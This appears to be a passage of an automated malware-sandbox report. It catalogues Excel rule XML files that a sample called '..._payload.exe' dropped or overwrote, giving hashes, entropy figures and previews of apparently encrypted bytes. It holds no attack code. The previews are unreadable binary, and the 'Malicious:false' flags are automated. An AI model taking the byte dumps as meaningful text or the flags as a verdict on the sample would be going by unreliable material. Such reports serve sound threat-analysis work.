                                                                                                                                                                      SSDEEP:24:GpAP+1lnT3OMRYQxnOJwzFFTFlBmBMIryam42bD:miOT+MRY7JS/nBmBzryFD
                                                                                                                                                                      MD5:725990A030349B8CD7EF5F7A297F14F6
                                                                                                                                                                      SHA1:3C61372AC14D6F220B000A70BDE900FCF57F3F77
                                                                                                                                                                      SHA-256:0478C2D0F4D24AB11AF2982F6DFE81D3347269E39B732B19875BFC1262FF05F0
                                                                                                                                                                      SHA-512:8754CEB5E3434C07A5568A841C485545C5CF74672A0DAFEE512010AD6EB8E260F0BEDF5B200062DF7A522F94F186D1451FB7FE206A6E208EDFAF46DC7C9D385B
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml....[...\..Km>1M......fV...u.RM...^'.-Q(...t..L96..Q. .A.Dp.._+.....;..g.x....`;...(.....<.........B3,.HzX.......O.Y.....}.-.E$...C~.........Xp....x.@...C&_.^}_..mK{.....F=y.L.^..i.......W..n..QD..X...[..)......YS..hy..P..u.{JM.2.n.....t..O..p.{.5..h..\y...U"@..F.Vi.......nW.A.X..qC.3..3.8A:.......@A,.!."%L..8U.,T...2...I.&.|....C....U...M..6$.M..9..:.r..F!..W..H'...5..s:.o.d1.;.+~1.0.oIZ.y..x.^.{..^.fLf^v)w.G.A~.f..$0...b].....hk....Dj.cj......Vv,...0+.Q...M.......#%{KA|.;...)y..-.It...0.Pv.x.o..k...6.....Wp.#'.NJ...w`...lc.1.O.....C.....;..../j6...ZS..N......,..W"[0.Cy.`<\.3.F-.........s..-p.y...l>.mPC..=H!~...z..@[...2...R.y&.xX....]..Oo.....L..r.C.....#I._81H..R.;..SU.k."^.d>F.vt...F@.+...........7...hD...\F.0C.?.k..Ypc.mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule240032v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1191
                                                                                                                                                                      Entropy (8bit):7.820383275089284
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:TuHhIqVEn7pVaOWSIpTl47CPpVO5J36QJJUmrvZKtKzH2bD:qHhIqVEnOO6Tl47CxVO5JTnUCvED
                                                                                                                                                                      MD5:78F720D7D0BE46A042A9DCEEA07B59B7
                                                                                                                                                                      SHA1:D16181FDCFC23FDA5F4D81E9BD4077D0FA866370
                                                                                                                                                                      SHA-256:1D2BFB3F886AB2A4B8CA4C31498C106F90C9CB401C5845544EA89D8DACCBE7D1
                                                                                                                                                                      SHA-512:C7509A4277CBB3847A765EC3F810656F3BF4BD49C27CCFF0EE3CBDD0839E9B1F5559071C7DFC06E2576AAE2A7BE6FBF310B28D40D901CCC200177E72EED0D8AD
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xmlW.3....4^..-.z...L.......`.#..3.h....It....uu."..8\,.d..Q....`>...b..G!z.Lw0t...L.-.W....x.L]..1G.../+...@...r.1.kV.O...\...0...f@>}S.V...Sn..|oc.=..h.k6.,...!.N..L..N...^.....V.Q...'}QX..j#...~C.J.[.o[.........W./.|g.d......Y......4R.@.....s......g..0.G...........<....}.........!.U..H.ci..... .,.Z.-B..D...m.s.6.j.6...;Zw..jQ._...D....U.b........}...Y.K.MZ..j.UH.m...r.g.uH._..].........+....{..%.S........R............8..D......R..i..T.c..sj).f..f......y...S.W....`.gr)+T..gn.p%.Zb....8K2.>n....T1..-B.~6..Q.@.^]...x.....5...oI.$.S..}.....;.Z...4..G&2I...y$..62f..i.<a...T.p.........b.^h.Y..p..U......|...WK..C.4....a...`..b.....q..^IL..Q...g:,dw.....A....K{...{.g.|.+...{M..o..U........^t...]..:i#\..aD{7../3..F.H4..........o..I........{W.&....S....C...%K..k;..g.DF.w$4. suu..K..];....Q...........7...I$.KUV..C..)l..../.V.J.. 0.}..4.}j1....V),.............r....O...>...M..];K.c._.IY.o.G..)Wg..r..S...b..!d..d-&7..c*......1...}>ok........y.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule240033v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1366
                                                                                                                                                                      Entropy (8bit):7.84556850357919
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:KggeCM33/T0piPJOAODIwsJHGOevNx5hfdv0NGpe3etxBRKJ2bD:DV3/T0piPJTGIzH3M5h1MApeuxBPD
                                                                                                                                                                      MD5:279A9042E2E14F4089EFC566671F4BC7
                                                                                                                                                                      SHA1:18C8AF8FD25C1CE3F47920850DED5A656A08007B
                                                                                                                                                                      SHA-256:C1A1E41769C43C2C4DDB03F744A98352935781B4FB168A8D968A0D4AE4DBB7AC
                                                                                                                                                                      SHA-512:4DC7AA7DD96D402ED66A89D7F36FD56FBBAA8DE7D8ACA0855E972D82D534C5E836CC8CED47617AD1A31DC8B642631120F2CD48AFA4A9A15554AA17AC34F1C3F3
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml4.3...z...x.Q.N..qR...(.Q.D...\]....a..........[H?...v..]..Y.Ww.0.']Z..F.B...A+u..P..,..(.....j.<.q...Jx.g.Z\...[..j.a...xG..w....kR....e]7D..r..F.MOI.s4...0..-e....R^p.....tl.)..D..H.f...t.4.....^.....[..Cbg.`..k..1...O?...Y.w..w.F.....'...!....#_%.q..........8..o..>...... ....c[...b0.....>|. .}.[-,D.s..<...A....+..FmZV.....H"........5".e..ro.-.tQ.3.._..^.~..........kZB..6...lK.78.n..B..} @./.P.......n..px;.;.V)....pP.W..f...._..K1...'..0..T.xj.......C..9.f(....hC~...YyX.6..+.7.0...D.}{:.......g......l..fGk((e.A..FD......?.P....{.s.{..d2.....l0f?Q....w...v.._.....d../V?.I.\b.....R.U.2C.kY....R*v!A...U.=..r.G..8.X...<.....@..z.\!.G]U}7b:./u..).......&K.7..f......!..P.M C..4j.eRh..,..D.W..2U....e>.=.....0.,f.=6..#'tn..<....|...9.=U...U...Cr...b.......7.f...6|...4.{.....N.$s#qo....'.f.'2eN.....ND6...>p..(..Q.+.?x...H.G..'...l...x. =.$.P.{.|x)..v2l.eo.J...IY.......a.......N59AN...OI..M.`....\..+WP.....R.k.-N.\....U.&j.......S...U..~w.\s.....O.Pj.3.~B.{*

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule240034v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):728
                                                                                                                                                                      Entropy (8bit):7.702287733016974
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:8w5H0DIbKj2h69eyP8faq9L1Axa03iFQd/3QAGvZIakMek3zwcl1/tSSUdNcii9a:8W4Qhvi8y6c3M8/3kjfTFh2bD
                                                                                                                                                                      MD5:EEEA5DCC16B231F5FC8A22404EA23253
                                                                                                                                                                      SHA1:0F0AD3C14332FDE0C2E598C49AF77B6E7000BB8D
                                                                                                                                                                      SHA-256:C8957AC6ECF658977BA10F210A64BB102A9903F820240AFA6E6C12AD37A91212
                                                                                                                                                                      SHA-512:907EB7CB4967CDFF53D3E83D5D4B7276A9FA9EDE24E427E4A4697DFD6CFD91BF23E27D51BE8B482821071BD5A6D9E25D0792B15FF92F10095FAECE87DA852408
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.....MI.q.F.3.;....>.|...j.zb^,.....7="=....b....H.......}..Qvj...q-.d1~.%..4........9.M.JDj[..?.XWX.....g....T...7.N....=.....Zz;0....*N.:..\.l..KU}:^&..dZ#..e.iw.~..F..]t.d[.,.g~z&...U......"z..c....AM..|pv.>6.......?......;:..9...4...=..`E..8.o;..TV...[."....U.f,....u...}.z...z..[.:...[q!Z....._.[....9..E.r.|C/m_..#........]r..y-..f..y<t.. ...~.\aQ......2*g...5~....(l^p9i.-...Oz4.B\.L;F.1....p..~....RC...N...`..8.L.(W.lKV...KC....pD.J......@p.(....V....pp.=..u......}O.d.r.O........q....X.*.D(O.+B.;oVt...W......[.u...u....9Q.j.Y.M...Z.H.....c....nx.....p..z.5....o....."...x..._.=s..S.&.. ......'.2.%.p>...._.^.6mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule240038v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1088
                                                                                                                                                                      Entropy (8bit):7.827005144070758
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:9kG0FY08RPlW2N2/XPAoRQMUxDhpX95d8IYnbhi9jMFBD42bD:93R9W2N4PAapM95HYnYWDrD
                                                                                                                                                                      MD5:0FB391D12DDEDF221D4116EEF90BF717
                                                                                                                                                                      SHA1:5D95C33C1C08CEFD27A5037C11E96094D804E735
                                                                                                                                                                      SHA-256:A652F20470EAA37069AB1DB86329A6068196FDE49E934DC60DCF957E077FA785
                                                                                                                                                                      SHA-512:F31B918C0B5EBFB6CBB6656136FC7B69A04CB301795197C3CF59D886D0FCBA5600C3ACA109F5950CB0DBFF878544CB4144FB623E93C628FE275C555515564E40
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml+Cm.P....~v....|s..."...0i..@.q.h5..I.si..cS.N..h.$..m.m..X..'.TpP#...`.z`......:.......3O....$.(i........Z.......w.......)f....E....Q.\.....ht...'.R..H...hh....,.........P.9.XB.c..(:Vi..3(W2.h..T.%U.-Al...-.P.......'jK.p^..|...%....;.V..8.-|j.L.=..D.*..N.a...M.[?.+p.>%...n.....9.]q..4..............&..G..b@sr4_.V.q.z1...r..../.....-/{...s9}.7].V.\.b......w.z....>L....r..J..'.qh.&s..l..1....u..28..M.6...H..c.&.V-j...X..?..d?.....j..jW.J...j...j$..lT..&....tj..*.%9..J...6LGQ.A..0......v.O.L..5.@....i..F7.bi....l'........=....e.K[..YC...(m.........V.2[.#....3"+...b?b%F..K..f..W2..>.".O.h....%{......W.&.....Z/:.E7.f..K.....5x......$.vdMT".k4...m.j.}..C....../+t5.....l.&...x.8..j...61..A..........;.l;.Z8SQ.2o...[8.x..zIO.1..*.jy].K../{~e.<.....E.h....W.. .F.c.|.T...}.0.4..cr......C.<.G...D.j.I.2..yhv...[H.fe'LB.....Q..^._>..&....#H.oQ.Q.5X......% K..J.Q.+;e.b...F......(4..':.nC.#..=.{A.....p.....^u%.wO.3)3...c......`..r....thx!..&.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule240039v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):999
                                                                                                                                                                      Entropy (8bit):7.780080929626013
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:pfFV6G22HmWssnOymo2eodjWqvNgtYUau7D6NVWRQd2bD:p9RHmWn98JckJ2D
                                                                                                                                                                      MD5:D0925274D1A8A7710556904608DA838E
                                                                                                                                                                      SHA1:F8375BAC7D324900F98B1A78D78576EFD4CDF059
                                                                                                                                                                      SHA-256:D56C76E9605B309B0B19B9BD8F2BBF55F1C03287A879FE1F5F2CD63459B717C7
                                                                                                                                                                      SHA-512:7DF456592262E2DBDB59D1E7053332795F915BE0A1FFA860D53F03DD32C0A70FEA707B4140FCECBE80E978299DA90949E35890F186F91C2CA77A18EA8F5ED10A
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.#.....N.]m.'....{-Z@.k.#..X!...-...._K...".6N..c..i.Mx..V~...>55B...\...9.0.A..s...).3...#"...Y&..T.|...r..`.Vuh...@..-(9.s..E..(.......!.b....p...*.........g.eU.`L?.......Z0..U..".....j..?<gG..L.....z.~..;.<.~xG..b..0....k..XW.s..u7]o..C.......S6R.%..# @..........p.DqIn...+8.UY.vd..i..Qm..9.[. .0..j...H.8..._...b..#(3......S....v.).....H...-Z.bq.>.....2..T.\U..9.@8(w..m..........1.^p.z.>l......^(T]...j.I[.~0.YK.W2.i....75$MSV....:......E.YL2.v..n..M^..[.........._.N.....}B..U.......3.....=....z........Z.Ue.......R..&6I........6V.....v(.NcG-h8..s..1.L.4m.2.7..N..A......U.....$.w`.f..N..g...73.;..~..s.p......%...._.w[..e..E.N7(;...77Q......N..Oo...y..C.h:....`.1.u..A~........}..W..;P...j.......9....JXc..fY|..zI..M..;...[.....W........=..p.o...........a.+.R.0.B.O .l.;...@mX=$....uXvLl.I>t2o..S.%....O..`]...X,.X]....]S.Ae '.5.........dC._..QZ.......1.,.F.mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule241000v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):4446
                                                                                                                                                                      Entropy (8bit):7.96028068491623
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:96:kGSXq1VlAg9PiddozOpc3CXrWjE8P1uvY8yCnQx9Sth0T19D8:8EcOypc3+EBPcvOCnQ2n0h9o
                                                                                                                                                                      MD5:1C9C4773A13AE082C6DF4570688B1B6D
                                                                                                                                                                      SHA1:8D2192921749BE2A4464854B4788F3D31142CFBD
                                                                                                                                                                      SHA-256:64CBBE7FD9C50E8F8E0E790471B2BBD7D578A6CB247F5816AE2A191E9D4ED069
                                                                                                                                                                      SHA-512:6FA253D3CF2836CB0E699969EB74EC6EE1D87832BBFBEF17FC2A6BD6EFF5B32055CEB5FD563D114DC04A3F6CD3DB03251935FE2F4FBF663B8C1EB7B95370C1E1
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.........4.....=..T.^.g..%.o.W.......'....7.MtO.mK..u.g...[4Ee._.O.W..'........f.0JYn0r.T..3E.W.B{D....A.)Q....N...|fU....3.....q..&88z.;k....I...C.yg.b$.L.'2....;d../.G.-*...WhI..........a..6...N..k..._n.^......g..B......w...m+g..&f..w...CI.p<Z.i.].d......H8m4..Y.,.t......X.3.O..:.W..p...9.%xd./g..H...t.dH,..y..7>....b9.k.4.JW.e..............j.-s..$4.....a...w......oYx.T...~...j;.T'........l.[H(......V.......,....W.......P(PV...Uc@.....GT^..%...}.......P.D!....Q%[...xLO...IR..:j...KW.2...5.....'.93..d,.......#.7=.a.-.g..v...0..#$.....H..Z...{...8...j.^....w.....%....C..p.x..M.d....S.].J.2^b......7......3ff.\..#....p....t.!v>V.j.vIc....{a=.;.....I.......GG\x..g......`I.;U.J.lI...x.1S.:.'..n^ZjoFOh.e&.$.Er...@..%y..p.2SX.....6.....K-...W.5.:.......a..SQ.x._v.W?^T.-/.P....IY......C...A.'{..1LrNl..E......YX.Lnp... .....\.....Z.ak.....:...[....aS..f.q...Pe....(./(...fG.8_....!#.j.b...H.'....M&......Z.1.......@bD.....[6...4I.d

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule241001v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):2306
                                                                                                                                                                      Entropy (8bit):7.9162614302010015
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:QaA23H/8lQIPkEOz0XsV6+bz4B1u+AN5WAkmtktuYYbD:QaA2P8+F6sVT21u+ANndKtuNX
                                                                                                                                                                      MD5:17FC1437260884CD782D3041BB484378
                                                                                                                                                                      SHA1:232B4EEF3D9631FED6161042D72742131D5459A7
                                                                                                                                                                      SHA-256:DEA160F91B28154967C9178015A8544913457A2349F9CDD44A9E55C8BD8E4F59
                                                                                                                                                                      SHA-512:3176BD7679C2DAC823C650345AEFDF7C548D249B633CD1FD7EA896A85BF435AE62C3C152A8B97C01CF4F17034CD2075D63021F5487F39AA0B72D5F5D2F88136C
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xmlbG.G...N; ..I.......x.]...v.{}....j...-_<.C.-....2.>......3...Q.=.$>.........d.......0...<]}.O.6.9..k...X.U.H.b.}C..........z...A...ik-f:..F)s}..Y.r[..[..y.cB.0/.].[._%.........=.p$....7.4.o...2.|........#....5..0[\..h........r....n..>...K.f.P.&.dT.q...a.W.Cb.d..j........UGS..Q....|.b........]8..,.....FG.[.M..n.f.u...lWB.R......J.#V......x.P..m...P6V...i......uO...~9....Z[sz.../.&.f....:$..J.u..g...#Uy.....^....t9*t.Sfz...c:.,.n*3.O.95.....q..)y..`$.#g%!F.....JKcf..m:{N.$Mn.x..#...MQ....m.5.!...UK.E[.............0w.N......p6.(......r..G"..k.66I.p.d.%.fm.Y......h...&}&...(.......6`Wb....=$........i..LM=._.|.#.l<$)..}......... ......1..M/....^.....K..J_Pj.SNjt.[7o......^..~....!K.:e...#......C...mqo..w.R.Acj.w!Z..5.....?Q..w(.Q...W..O.r.l..~j.W.R..]U.90.2.....W..G.z......w.........@.'.jF.|F=..Y.{.wi;W6.<..@......$.." ."....4.H...~..A.....Bn.5S..........8d...*...#:..M.m/"5..,q|a...IE.L.8.'.g.2G....;>dQ...9*;..CA..hi.f+{.?z.*f......"j.6;) ..H[

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule241002v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):2376
                                                                                                                                                                      Entropy (8bit):7.912045096619297
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:aMFAYAxFWmrN0Ytda/TuGkpg5qLFFAS4rSeXmMO5+vkdlD:rAp0Udo42qzIrSvf55
                                                                                                                                                                      MD5:07EDF8530662D860C66737280FAC9F02
                                                                                                                                                                      SHA1:B4DB507CDACAB6525B8650FBE9C7C23D13937DB6
                                                                                                                                                                      SHA-256:5AADCDB93687FC6B434FFD25872544BE00261011AB712F176170F70B3A33B174
                                                                                                                                                                      SHA-512:50972781D856E313B93E44A2FA92F60185D2CA31BA3A9F0D129F213B8198D64954C52F9DBA9FC574451C1FDCC3BC2F971F8C95307C23FB98978D543EE90044FA
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.F..MJ..BZ..qYfp.5.Q....a..;..../....1.D.Zi..}b.k.RV..."&.Q.........Q *.................F...X6.../.....|%.W...(i.<.FQ..i...vSaY..q....v4..<.Y.G..&..d.....&j.,.t'..I.G......m.n.....ov.Ym...5.XW.PC.X0*..?95..vbr.r.\\.M.......z[......K..C...`;.8....t.a.)C!z.n..I...SvKF.....1..\..t...j...K....i.p..<...$Y77f]....W....<..v..)..L#.w..5P...xl!.o9.@.X%..p<\........].t'.7R.Li....8..Y.4Q.z)......0...C.....S../.t.w-.9........v.|c.g.r9Q{.;....bc!Q.0C...0'05K..I..;,..Bq....+6f.aT;........l.....T:....<.7F.}....b.ms=.....y.^... .u.N|S.."....C..H.....3..........h.R.........z.".*......-WzvU....GW\.+..]..a.V........v.}...&Av`.k|.O.."..Tv.......S..z..8V.t.+.C.v.% ........:..r.....z.lML.r.nI.a!..R\...8.......k....H<~..p........n.C.^.ar.....h9.j.ela..0>...+l.1D.!Z'.L._.j|....kmO..oW-..-U..6.S .&k \.....w..p.>.C.2}@....A...!.O..M.m......*.>y;....N.P..o.J./.alV".Z.|q..BC..B..kN.g..Q.H..3..m.A.o..7u.GJ...:4.;..@YQ..."....V..W......Vr.q0.t$3.M...

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule270000v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1043
                                                                                                                                                                      Entropy (8bit):7.807185400630087
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:+1PN2j4k5xvM9YciDozIR4iAYIUj4UFapSD+aFd5J3uV2bD:+5Tk/M98DozIeitlpD+Y5J3uuD
                                                                                                                                                                      MD5:4DD631704C1E229B0F42740350AF8F26
                                                                                                                                                                      SHA1:960CE5F258C10D4A36B10332188374D08580D7AB
                                                                                                                                                                      SHA-256:A201541A3F2CA8F9A450FE8BED59651623754E06C86AFEA497E7D2DEC0ECB113
                                                                                                                                                                      SHA-512:86044D23843AADC9F2A1432B640D345413BDB2D17C9195C96E35ABDB4F7309497462BDEA961B0838506990B5CBBBDA23A02036927C06A7FC1207778E5032BA63
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xmlk...N..Q=..bO'm...^P.......DB.]..^.r.B.z.._v1..(P.^............G.o.!......+%J5(`.v.......`..-_.#..gj.......k......6,..zGf$G...DnPE.....L..K.E{z..u....e...kA?...4....^.2.w..Yl...\.....z..$..\....Bg_?a\..?.......s.%...>..O....'...b.V..!e...F)@4...3..";...9.P../7.......I.{g.V..r\Y1.' ....0..{.F......I.}W.ov...x..\R.J.5r..........^^..td..E.....M...D_b..#Y...H...y..$9..pn.. ,..H..r...:..q.....@.g............%......j.l.+.$....Jp..'..u.$q...\......[...Nd.."D(Y......E..G..,Mq......S...r.3.H.O..PufR.N..}........+.-q...].........z.]-'.N....&PR.l-..(.M.-...A./; .!L|G).p6..K........C.EiT.<F.M..K..2pL.....'."/.6...I.p....l..\$.".......:.......+E.gK6V..Lm~3*.....Er>....!RL....@e`.e$J.N... .x..nM.c.........6Y......".....5.d...._4....^F.?.U..D?vna..H.P...6J..@.}../sXTaw^/ .}.5....)..=.0p....}...C(a....r.W.\]c.....F...g..+..>$:..m.D&...F5.f:$h.i.......*.\...../o...LMh.%,b....-pr..s..$.AG.Z....7.S.43.|.L.....*M...mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7P

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule270001v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):961
                                                                                                                                                                      Entropy (8bit):7.814466248174444
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:XVoeVZuK9GGP7gXEWdYnqs4HHxGI8euuo/dvt2bD:/u4Go2rY8GIlu5dOD
                                                                                                                                                                      MD5:DC0D43B1C19767EDA7575BB11DBDB4C9
                                                                                                                                                                      SHA1:583690B8C5FB66EBBE14FFBC5FD538DEF3225738
                                                                                                                                                                      SHA-256:3913EBDF587498AB42536DF8B1FEFB407D8F18D6B1BE0A37B189B11B50551AD6
                                                                                                                                                                      SHA-512:320EBD176F522EE88DD40D5207900D39E748EC66F0CDB104FFE0F01202F733E99E8EAE5FFBC8E7EB49B3D4C13E4A89F0019C739C71D64C73819ACC861C0EC34B
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml...O..g.)Y.v}.`..[. ...d..Y&wa...d.....DN....................F........az,...7.n.f..wI]...Ls..y{a.IF..1......Ge.R..g..'.KoFxR%..J..8........b.V`.(..IV.ZIUg...$..h._.8\...."...9..I.7.&..1..V..:......sH;....u{.1.....Xf..h...;l..b...jD..3.......j...A..}...?/......M...d)..A3Q7H..:.lb..N..*......W.c...L.=.#....iIDO.^...v.K.e...C.......?X._P...._....jg.Hk..N}..?7y&.tx.X......A...:R1..!.xFGTv..+U..wG.,..Bys.+.....i6........0....7.....F..9P.=...;.T....&.R.K%..40)...i.X.:....f...8....}.@...6oud..r.R{<X...}.9......:Uu.s.bs..B......2.L...JE.........Ph..P.i.....+...H....Sh.!....{J..h]/_tBR..%.E...............Q....?.t..ds..yI..}..a.1..&.N.+p...7G.6..nN.W.U6..........V`VqrmI...e$B. f.Br]..[...-..H...NlDI....W....1{.BY..c".=..D@Z.,.k..W......!#..$.... c.J.@....5$#..c....@..X...t"..L.......|......R......g'..F3...~..B.!^..9...I......mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule270002v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1126
                                                                                                                                                                      Entropy (8bit):7.815006860697807
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:9dpaXDQ/ipOoA0fU3w3MTW7ckmsWiPQxACuEOJYOQBV2bD:fYXOipOoAh36cW7cVsMwZJrQsD
                                                                                                                                                                      MD5:CA623BA447426132B6CC83640F7CB5AE
                                                                                                                                                                      SHA1:A8480CCE96FAD4AD0F9365688B1677C8B8906221
                                                                                                                                                                      SHA-256:BB80CD17933C0563F0DB4F0E4A51F112C20ED8C28EC27FAC9F037723EA276091
                                                                                                                                                                      SHA-512:0E4C9F6B4A00279EA563C6CE0AFEB6A6A41C9E4454E1E308278807A7F8EB2B1F2DD4C707AF8A42DBB5A48524E09207E6FC763BCC7E4BF4A35B1DEB472D15D7BD
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.j.Suh-F..V.-...Y..x.*...~A..^4...<...,..;.^..|..C......H%WK.-............Q....q.$...._.:..a.*.G(gRz_...;....c.R......S&..j..ya\.>e..V...Hx....g..w.P,....^..D.M&.N.|J...c.....k....$........&j.;;..5'wHs#oI.c.3.~Nv.3.!.W..*...........@.]...?`.B...>^..kc\.i....~p;K..Y..9?.&...%....2r....cG..I....X.C..;...0...p.\.H...S?.L...T%....^..U...%._..-wmD...4y...2........"...O1a.d.2.?F^..^`...+H/O.V]D...tB.X!.-.....^}.??..T.l[.[...I..u....t.&.x.}.>./B.5.*..h./r....5K.<.|..Dt........H..<Lo"X.%.+..]...6...x.IW..N...2.j..T[.o....k.:..V..B&bC@T.....0dG.:.K.-.*.Y.p{..5.U1...9=uV.nS.(ua.],W.&Os...u.AZ=..di.......^... \}.UG.7.!.(.0..:.b..~:yB..&.g......PV....t.h;./.if...-....I.Z.v.SWQ......e..!...77.|.65.HR.X.........y.S..y..z..).+?O...1N.c7z..Syv".D..V/IO>(HQ.$1..&:....O.Y+.`.....L,~.t9'............A..3..D...E.....o...4.R ;x.......UJ...{..K.......z).h...K..v.....!.....*,.;x..b_5w"6*.PP\../.....=`.Wkl..j..(.*.O..Tg.bc.U$....}.)....Vh.t.h...

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule270003v2.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1662
                                                                                                                                                                      Entropy (8bit):7.873790928331433
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:VlGZTS6U7u0IOinxIzej7M7Hxp7tEO66CD:TGZZU7cdniqjExpg6K
                                                                                                                                                                      MD5:3357826B9AC3FD9E17E21AB3882E6B4B
                                                                                                                                                                      SHA1:0274FB81FD2D6F57D1F79E2F5E43CB0ACF13EF16
                                                                                                                                                                      SHA-256:BAF1211BF1716BFAEA606CBAF77E446884C5F7DBCAE0BD34F943A19DFAA20948
